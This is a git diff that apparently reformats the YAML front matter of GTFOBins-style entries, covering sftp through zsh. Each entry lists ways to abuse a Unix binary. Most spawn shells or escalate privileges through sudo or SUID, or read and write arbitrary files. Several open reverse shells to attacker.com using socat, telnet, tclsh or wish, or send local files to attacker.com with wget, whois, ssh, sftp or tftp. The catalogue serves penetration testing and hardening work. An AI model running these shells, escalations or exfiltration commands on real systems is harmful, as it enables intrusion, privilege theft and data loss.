a/_gtfobins/sftp.md b/_gtfobins/sftp.md index 743b96f..17d8fe4 100644 --- a/_gtfobins/sftp.md +++ b/_gtfobins/sftp.md @@ -1,25 +1,25 @@ --- functions: execute-interactive: - - code: | - HOST=user@attacker.com - sftp $HOST - !/bin/sh + - code: | + HOST=user@attacker.com + sftp $HOST + !/bin/sh upload: - - description: Send local file to a SSH server. - code: | - RHOST=user@attacker.com - sftp $RHOST - put file_to_send file_to_save + - description: Send local file to a SSH server. + code: | + RHOST=user@attacker.com + sftp $RHOST + put file_to_send file_to_save download: - - description: Fetch a remote file from a SSH server. - code: | - RHOST=user@attacker.com - sftp $RHOST - get file_to_get file_to_save + - description: Fetch a remote file from a SSH server. + code: | + RHOST=user@attacker.com + sftp $RHOST + get file_to_get file_to_save sudo-enabled: - - code: | - HOST=user@attacker.com - sudo sftp $HOST - !/bin/sh + - code: | + HOST=user@attacker.com + sudo sftp $HOST + !/bin/sh --- diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md index 924ea0e..eedba39 100644 --- a/_gtfobins/shuf.md +++ b/_gtfobins/shuf.md @@ -2,16 +2,16 @@ description: The read file content is corrupted by adding a newline. functions: file-write: - - code: | - LFILE=file_to_write - shuf -e data -o "$LFILE" + - code: | + LFILE=file_to_write + shuf -e data -o "$LFILE" suid-enabled: - - description: - code: | - LFILE=file_to_write - ./shuf -e data -o "$LFILE" - sudo-enabled: - - code: | - LFILE=file_to_write - sudo shuf -e data -o "$LFILE" + - description: + code: | + LFILE=file_to_write + ./shuf -e data -o "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_write + sudo shuf -e data -o "$LFILE" --- diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index dc524ff..2e84b46 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,16 +1,14 @@ --- functions: reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on - the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane bind-shell-interactive: - - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 - on the attacker box to connect to the shell. - code: | - LPORT=12345 - socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane + - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. + code: | + LPORT=12345 + socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane --- diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md index 42f8b2c..a352a5c 100644 --- a/_gtfobins/sort.md +++ b/_gtfobins/sort.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - sort -m "$LFILE" + - code: | + LFILE=file_to_read + sort -m "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./sort -m "$LFILE" + - code: | + LFILE=file_to_read + ./sort -m "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo sort -m "$LFILE" + - code: | + LFILE=file_to_read + sudo sort -m "$LFILE" --- diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index 5b4f1f2..180edda 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -1,21 +1,21 @@ --- functions: execute-interactive: - - code: sqlite3 /dev/null '.shell /bin/sh' + - code: sqlite3 /dev/null '.shell /bin/sh' file-write: - - code: | - LFILE=file_to_write - sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' + - code: | + LFILE=file_to_write + sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' file-read: - - code: | - LFILE=file_to_read - sqlite3 << EOF - CREATE TABLE t(line TEXT); - .import $LFILE t - SELECT * FROM t; - EOF + - code: | + LFILE=file_to_read + sqlite3 << EOF + CREATE TABLE t(line TEXT); + .import $LFILE t + SELECT * FROM t; + EOF sudo-enabled: - - code: sudo sqlite3 /dev/null '.shell /bin/sh' + - code: sudo sqlite3 /dev/null '.shell /bin/sh' suid-limited: - - code: "./sqlite3 /dev/null '.shell /bin/sh'" + - code: "./sqlite3 /dev/null '.shell /bin/sh'" --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index bd3a290..24fe52e 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -1,32 +1,30 @@ --- functions: execute-interactive: - - description: Reconnecting may help bypassing restricted shells. - code: ssh localhost $SHELL --noprofile --norc - - description: Spawn interactive shell through ProxyCommand option. - code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" - x + - description: Reconnecting may help bypassing restricted shells. + code: ssh localhost $SHELL --noprofile --norc + - description: Spawn interactive shell through ProxyCommand option. + code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x upload: - - description: Send local file to a SSH server. - code: | - HOST=user@attacker.com - RPATH=file_to_save - LPATH=file_to_send - ssh $HOST "cat > $RPATH" < $LPATH + - description: Send local file to a SSH server. + code: | + HOST=user@attacker.com + RPATH=file_to_save + LPATH=file_to_send + ssh $HOST "cat > $RPATH" < $LPATH download: - - description: Fetch a remote file from a SSH server. - code: | - HOST=user@attacker.com - RPATH=file_to_get - LPATH=file_to_save - ssh $HOST "cat $RPATH" > $LPATH + - description: Fetch a remote file from a SSH server. + code: | + HOST=user@attacker.com + RPATH=file_to_get + LPATH=file_to_save + ssh $HOST "cat $RPATH" > $LPATH file-read: - - description: The read file content is corrupted by error prints. - code: | - LFILE=file_to_read - ssh -F $LFILE localhost + - description: The read file content is corrupted by error prints. + code: | + LFILE=file_to_read + ssh -F $LFILE localhost sudo-enabled: - - description: Spawn interactive root shell through ProxyCommand option. - code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh - -i'" x + - description: Spawn interactive root shell through ProxyCommand option. + code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x --- diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md index c0e4181..24977b8 100644 --- a/_gtfobins/stdbuf.md +++ b/_gtfobins/stdbuf.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: stdbuf -i0 /bin/sh + - code: stdbuf -i0 /bin/sh suid-enabled: - - code: "./stdbuf -i0 /bin/sh -p" + - code: ./stdbuf -i0 /bin/sh -p sudo-enabled: - - code: sudo stdbuf -i0 /bin/sh + - code: sudo stdbuf -i0 /bin/sh --- diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md index 2302f19..18cfdb0 100644 --- a/_gtfobins/strace.md +++ b/_gtfobins/strace.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: strace -o /dev/null /bin/sh + - code: strace -o /dev/null /bin/sh suid-enabled: - - code: "./strace -o /dev/null /bin/sh -p" + - code: ./strace -o /dev/null /bin/sh -p sudo-enabled: - - code: sudo strace -o /dev/null /bin/sh + - code: sudo strace -o /dev/null /bin/sh --- diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md index f7090f1..0235e3a 100644 --- a/_gtfobins/tail.md +++ b/_gtfobins/tail.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + tail -c1G "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + ./tail -c1G "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + sudo tail -c1G "$LFILE" --- diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index 01afeef..73491e6 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md @@ -1,24 +1,24 @@ --- functions: execute-interactive: - - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh execute-non-interactive: - - description: This only works for GNU tar. - code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' + - description: This only works for GNU tar. + code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' file-write: - - description: This only works for GNU tar. - code: | - LFILE=file_to_write - TF=$(mktemp) - echo data > "$TF" - tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P + - description: This only works for GNU tar. + code: | + LFILE=file_to_write + TF=$(mktemp) + echo data > "$TF" + tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P file-read: - - description: This only works for GNU tar. - code: | - LFILE=file_to_read - tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' + - description: This only works for GNU tar. + code: | + LFILE=file_to_read + tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' sudo-enabled: - - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh suid-limited: - - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" + - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh --- diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md index 7c90197..4f3d474 100644 --- a/_gtfobins/taskset.md +++ b/_gtfobins/taskset.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: taskset 1 /bin/sh + - code: taskset 1 /bin/sh suid-enabled: - - code: "./taskset 1 /bin/sh -p" + - code: ./taskset 1 /bin/sh -p sudo-enabled: - - code: sudo taskset 1 /bin/sh + - code: sudo taskset 1 /bin/sh --- diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index 582cd12..db81e7f 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md @@ -1,21 +1,21 @@ --- functions: execute-interactive: - - code: | - tclsh - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh suid-enabled: - - code: | - ./tclsh - exec /bin/sh -p <@stdin >@stdout 2>@stderr + - code: | + ./tclsh + exec /bin/sh -p <@stdin >@stdout 2>@stderr sudo-enabled: - - code: | - sudo tclsh - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + sudo tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr --- diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index a10c8c7..9dca238 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -1,18 +1,16 @@ --- -description: 'It can only append data if the destination exists. - -' +description: It can only append data if the destination exists. functions: file-write: - - code: | - LFILE=file_to_write - echo data | ./tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | ./tee -a "$LFILE" suid-enabled: - - code: | - LFILE=file_to_write - echo data | ./tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | ./tee -a "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_write - echo data | sudo tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | sudo tee -a "$LFILE" --- diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index e237c64..35a53cd 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -1,35 +1,35 @@ --- functions: execute-interactive: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + telnet $RHOST $RPORT + ^] + !/bin/sh reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - TF=$(mktemp) - rm $TF - mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + TF=$(mktemp) + rm $TF + mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF sudo-enabled: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - sudo telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + sudo telnet $RHOST $RPORT + ^] + !/bin/sh suid-limited: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - ./telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + ./telnet $RHOST $RPORT + ^] + !/bin/sh --- diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md index 173edd6..f391860 100644 --- a/_gtfobins/tftp.md +++ b/_gtfobins/tftp.md @@ -1,15 +1,15 @@ --- functions: upload: - - description: Send local file to a TFTP server. - code: | - RHOST=attacker.com - tftp $RHOST - put file_to_send + - description: Send local file to a TFTP server. + code: | + RHOST=attacker.com + tftp $RHOST + put file_to_send download: - - description: Fetch a remote file from a TFTP server. - code: | - RHOST=attacker.com - tftp $RHOST - get file_to_get + - description: Fetch a remote file from a TFTP server. + code: | + RHOST=attacker.com + tftp $RHOST + get file_to_get --- diff --git a/_gtfobins/time.md b/_gtfobins/time.md index 97c4be1..2434124 100644 --- a/_gtfobins/time.md +++ b/_gtfobins/time.md @@ -1,12 +1,10 @@ --- -description: | - Note that the shell might have its own builtin time implementation, which may - behave differently than` /usr/bin/time`, hence the absolute path. +description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path. functions: execute-interactive: - - code: "/usr/bin/time /bin/sh" + - code: /usr/bin/time /bin/sh suid-enabled: - - code: "./time /bin/sh -p" + - code: ./time /bin/sh -p sudo-enabled: - - code: sudo /usr/bin/time /bin/sh + - code: sudo /usr/bin/time /bin/sh --- diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md index 6a4742a..565e594 100644 --- a/_gtfobins/timeout.md +++ b/_gtfobins/timeout.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: timeout 7d /bin/sh + - code: timeout 7d /bin/sh suid-enabled: - - code: "./timeout 7d /bin/sh -p" + - code: ./timeout 7d /bin/sh -p sudo-enabled: - - code: sudo timeout --foreground 7d /bin/sh + - code: sudo timeout --foreground 7d /bin/sh --- diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md index 6da459d..06462f9 100644 --- a/_gtfobins/ul.md +++ b/_gtfobins/ul.md @@ -1,18 +1,16 @@ --- -description: | - The read file content is corrupted by replacing occurrences of `$'\b_'` to - terminal sequences and by converting tabs to spaces. +description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. functions: file-read: - - code: | - LFILE=file_to_read - ul "$LFILE" + - code: | + LFILE=file_to_read + ul "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./ul "$LFILE" + - code: | + LFILE=file_to_read + ./ul "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo ul "$LFILE" + - code: | + LFILE=file_to_read + sudo ul "$LFILE" --- diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md index 601ea73..67efcb3 100644 --- a/_gtfobins/unexpand.md +++ b/_gtfobins/unexpand.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + unexpand -t99999999 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + ./unexpand -t99999999 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + sudo unexpand -t99999999 "$LFILE" --- diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index d2208d6..04cfdc5 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -1,18 +1,16 @@ --- -description: 'The read file content is corrupted by squashing multiple adjacent lines. - -' +description: The read file content is corrupted by squashing multiple adjacent lines. functions: file-read: - - code: | - LFILE=file_to_read - uniq "$LFILE" + - code: | + LFILE=file_to_read + uniq "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./uniq "$LFILE" + - code: | + LFILE=file_to_read + ./uniq "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo uniq "$LFILE" + - code: | + LFILE=file_to_read + sudo uniq "$LFILE" --- diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md index 222cac2..e0396bb 100644 --- a/_gtfobins/unshare.md +++ b/_gtfobins/unshare.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: unshare /bin/sh + - code: unshare /bin/sh suid-enabled: - - code: "./unshare -r /bin/sh" + - code: ./unshare -r /bin/sh sudo-enabled: - - code: sudo unshare /bin/sh + - code: sudo unshare /bin/sh --- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index a6849d1..d5c6a77 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -1,21 +1,19 @@ --- functions: execute-interactive: - - code: vi -c ':!/bin/sh' - - code: | - vi - :set shell=/bin/sh - :shell + - code: vi -c ':!/bin/sh' + - code: | + vi + :set shell=/bin/sh + :shell file-write: - - code: | - vi file_to_write - w + - code: | + vi file_to_write + w file-read: - - code: 'vi file_to_read - -' + - code: vi file_to_read suid-enabled: - - code: "./vi -c ':!/bin/sh -p'" + - code: ./vi -c ':!/bin/sh -p' sudo-enabled: - - code: sudo vi -c ':!/bin/sh' + - code: sudo vi -c ':!/bin/sh' --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index dc8fd22..06b5fbb 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md @@ -1,12 +1,12 @@ --- functions: execute-non-interactive: - - code: watch /usr/bin/id + - code: watch /usr/bin/id suid-enabled: - - description: This keeps the SUID privileges only if the `-x` option is present. - code: "./watch -x /usr/bin/id" + - description: This keeps the SUID privileges only if the `-x` option is present. + code: ./watch -x /usr/bin/id sudo-enabled: - - code: sudo watch /usr/bin/id + - code: sudo watch /usr/bin/id suid-limited: - - code: "./watch /usr/bin/id" + - code: ./watch /usr/bin/id --- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index 16ccf00..1c141e6 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -1,16 +1,15 @@ --- functions: upload: - - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. - Run an HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL + - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - wget $URL -O $LFILE + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + wget $URL -O $LFILE --- diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md index 71bffd9..f0e0d21 100644 --- a/_gtfobins/whois.md +++ b/_gtfobins/whois.md @@ -1,37 +1,31 @@ --- -description: "`whois` hangs waiting for the remote peer to close the socket.\n" +description: | + `whois` hangs waiting for the remote peer to close the socket. functions: upload: - - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` - and its length is limited by the maximum size of arguments. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - whois -h $RHOST -p $RPORT "`cat $LFILE`" - - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' - | base64 -d > "file_to_save"` on the attacker box to collect the file. The file - length is limited by the maximum size of arguments. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - whois -h $RHOST -p $RPORT "`base64 $LFILE`" + - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`cat $LFILE`" + - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`base64 $LFILE`" download: - - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 - < "file_to_send"` on the attacker box to send the file. The file has instances - of `$'\x0d'` stripped. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_save - whois -h $RHOST -p $RPORT > "$LFILE" - - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" - | nc -l -p 12345` on the attacker box to send the file. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_save - whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" + - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + whois -h $RHOST -p $RPORT > "$LFILE" + - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" --- diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md index e495e28..47fdba1 100644 --- a/_gtfobins/wish.md +++ b/_gtfobins/wish.md @@ -1,17 +1,17 @@ --- functions: execute-interactive: - - code: | - wish - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + wish + exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish sudo-enabled: - - code: | - sudo wish - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + sudo wish + exec /bin/sh <@stdin >@stdout 2>@stderr --- diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index a38ac2e..5a15f74 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md @@ -1,16 +1,14 @@ --- functions: execute-non-interactive: - - code: xargs -a /dev/null /usr/bin/id + - code: xargs -a /dev/null /usr/bin/id file-read: - - description: This works as long as the file does not contain the NUL character, - also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. - GNU version only. - code: | - LFILE=file_to_read - xargs -a "$LFILE" -0 + - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. + code: | + LFILE=file_to_read + xargs -a "$LFILE" -0 suid-enabled: - - code: "./xargs -a /dev/null /usr/bin/id" + - code: ./xargs -a /dev/null /usr/bin/id sudo-enabled: - - code: sudo xargs -a /dev/null /usr/bin/id + - code: sudo xargs -a /dev/null /usr/bin/id --- diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md index 7d854bb..1ed5eff 100644 --- a/_gtfobins/xxd.md +++ b/_gtfobins/xxd.md @@ -1,19 +1,19 @@ --- functions: file-write: - - code: | - LFILE=file_to_write - echo data | xxd | xxd -r - "$LFILE" + - code: | + LFILE=file_to_write + echo data | xxd | xxd -r - "$LFILE" file-read: - - code: | - LFILE=file_to_read - xxd "$LFILE" | xxd -r + - code: | + LFILE=file_to_read + xxd "$LFILE" | xxd -r suid-enabled: - - code: | - LFILE=file_to_read - ./xxd "$LFILE" | xxd -r + - code: | + LFILE=file_to_read + ./xxd "$LFILE" | xxd -r sudo-enabled: - - code: | - LFILE=file_to_read - sudo xxd "$LFILE" | xxd -r + - code: | + LFILE=file_to_read + sudo xxd "$LFILE" | xxd -r --- diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md index 4e73feb..59dbcb0 100644 --- a/_gtfobins/zsh.md +++ b/_gtfobins/zsh.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: zsh + - code: zsh suid-enabled: - - code: "./zsh" + - code: ./zsh sudo-enabled: - - code: sudo zsh + - code: sudo zsh ---